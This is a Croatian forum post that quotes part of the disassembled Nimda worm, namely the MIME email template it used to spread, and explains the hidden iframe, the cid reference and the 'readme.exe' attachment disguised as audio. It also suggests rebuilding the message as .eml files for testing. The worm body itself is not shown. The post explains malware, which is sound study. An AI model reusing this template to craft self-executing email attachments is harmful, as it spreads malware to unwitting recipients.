SEH
Član broj: 2215 Poruke: 94 *.net.hinet.hr
|
Evo ti izvadak iz disasemblirane Nimde:
.data:361790CC nametag db 'Concept Virus(CV) V.5, Copyright(C)2001 R.P.China',0
.data:361790FF align 4
.data:36179100 MIME_header db 'MIME-Version: 1.0',0Dh,0Ah
.data:36179100 ; DATA XREF: sub_0_361767C9+CDo
.data:36179100 ; sub_0_361767C9+D9o
.data:36179100 db 'Content-Type: multipart/related;',0Dh,0Ah
.data:36179100 db 9,'type="multipart/alternative";',0Dh,0Ah
.data:36179100 db 9,'boundary="====_ABC1234567890DEF_===="',0Dh,0Ah
.data:36179100 db 'X-Priority: 3',0Dh,0Ah
.data:36179100 db 'X-MSMail-Priority: Normal',0Dh,0Ah
.data:36179100 db 'X-Unsent: 1',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '--====_ABC1234567890DEF_====',0Dh,0Ah
.data:36179100 db 'Content-Type: multipart/alternative;',0Dh,0Ah
.data:36179100 db 9,'boundary="====_ABC0987654321DEF_===="',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '--====_ABC0987654321DEF_====',0Dh,0Ah
.data:36179100 db 'Content-Type: text/html;',0Dh,0Ah
.data:36179100 db 9,'charset="iso-8859-1"',0Dh,0Ah
.data:36179100 db 'Content-Transfer-Encoding: quoted-printable',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>',0Dh,0Ah
.data:36179100 db '<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>',0Dh,0Ah
.data:36179100 db '</iframe></BODY></HTML>',0Dh,0Ah
.data:36179100 db '--====_ABC0987654321DEF_====--',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '--====_ABC1234567890DEF_====',0Dh,0Ah
.data:36179100 db 'Content-Type: audio/x-wav;',0Dh,0Ah
.data:36179100 db 9,'name="readme.exe"',0Dh,0Ah
.data:36179100 db 'Content-Transfer-Encoding: base64',0Dh,0Ah
.data:36179100 db 'Content-ID: <EA4DMGBP9p>',0Dh,0Ah
.data:36179100 db 0Dh,0Ah,0
Izgleda bas shitty, potrazi na google plain text verziju. Ono pod jednostrukim navodnicma ti je text poruke. Ono 0Dh,0Ah ti je hexadecimalno 13,10 sto je CRLF (carriage return + line feed) iliti newline. To znaci da tu trebas pritisnuti enter kad budes pretipkavao ovaj kod. Ono 9 ti je ASCII kod za tab. Uoci ove dijelove:
<iframe src=3Dcid:EA4DMGBP9p -> famozni cid
i
Content-Type: audio/x-wav
name="readme.exe" ->jos famozniji readme.exe
Content-Transfer-Encoding: base64 -> base64 enkodirano tijelo crva
Content-ID: <EA4DMGBP9p> ->ovaj ID je isti kao i onaj gore, sto znaci da ce kao 'src' e-mail klijent traziti base64 enkodirani attachment. Naravno, nakon toga Nimda ubaci base64 verziju sebe i posalje ovakvu poruku nekom sretniku koji ima ranjivi Outlook. Ako si ikad primio neku HTML e-mail poruku sa attachmentom (tko nije?), u Outlooku je oznaci, desni klik, Properties->Details->Message Source pa usporedi taj kod sa ovim gore. Ako zelis testirati na sebi, napravi nekoliko e-mail poruka, sejvaj ih kao *.eml i otvori ih u Outlooku.
|